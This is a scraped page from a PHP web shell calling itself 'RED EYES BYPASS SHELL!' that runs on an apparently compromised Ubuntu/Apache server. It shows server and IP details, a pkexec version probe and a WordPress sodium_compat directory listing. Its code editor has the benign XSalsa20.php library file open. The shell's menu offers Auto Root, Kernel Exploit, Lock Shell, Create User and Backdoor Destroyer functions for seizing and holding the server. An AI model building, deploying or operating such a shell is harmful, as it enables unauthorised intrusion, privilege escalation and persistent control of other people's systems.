Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
bigdata /
wp-includes /
sodium_compat /
src /
Core /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
AEGIS
[ DIR ]
drwxr-xr-x
AES
[ DIR ]
drwxr-xr-x
Base64
[ DIR ]
drwxr-xr-x
ChaCha20
[ DIR ]
drwxr-xr-x
Curve25519
[ DIR ]
drwxr-xr-x
Poly1305
[ DIR ]
drwxr-xr-x
SecretStream
[ DIR ]
drwxr-xr-x
AEGIS128L.php
3.58
KB
-rwxr-xr-x
AEGIS256.php
3.51
KB
-rwxr-xr-x
AES.php
15.51
KB
-rwxr-xr-x
BLAKE2b.php
23.63
KB
-rwxr-xr-x
ChaCha20.php
12.59
KB
-rwxr-xr-x
Curve25519.php
140.27
KB
-rwxr-xr-x
Ed25519.php
17.38
KB
-rwxr-xr-x
HChaCha20.php
4.04
KB
-rwxr-xr-x
HSalsa20.php
3.59
KB
-rwxr-xr-x
Poly1305.php
1.54
KB
-rwxr-xr-x
Ristretto255.php
21.37
KB
-rwxr-xr-x
Salsa20.php
8.04
KB
-rwxr-xr-x
SipHash.php
8.04
KB
-rwxr-xr-x
Util.php
28.23
KB
-rwxr-xr-x
X25519.php
8.22
KB
-rwxr-xr-x
XChaCha20.php
3.24
KB
-rwxr-xr-x
XSalsa20.php
1.34
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : XSalsa20.php
<?php if (class_exists('ParagonIE_Sodium_Core_XSalsa20', false)) { return; } /** * Class ParagonIE_Sodium_Core_XSalsa20 */ abstract class ParagonIE_Sodium_Core_XSalsa20 extends ParagonIE_Sodium_Core_HSalsa20 { /** * Expand a key and nonce into an xsalsa20 keystream. * * @internal You should not use this directly from another application * * @param int $len * @param string $nonce * @param string $key * @return string * @throws SodiumException * @throws TypeError */ public static function xsalsa20($len, $nonce, $key) { $ret = self::salsa20( $len, self::substr($nonce, 16, 8), self::hsalsa20($nonce, $key) ); return $ret; } /** * Encrypt a string with XSalsa20. Doesn't provide integrity. * * @internal You should not use this directly from another application * * @param string $message * @param string $nonce * @param string $key * @return string * @throws SodiumException * @throws TypeError */ public static function xsalsa20_xor($message, $nonce, $key) { return self::xorStrings( $message, self::xsalsa20( self::strlen($message), $nonce, $key ) ); } }
Close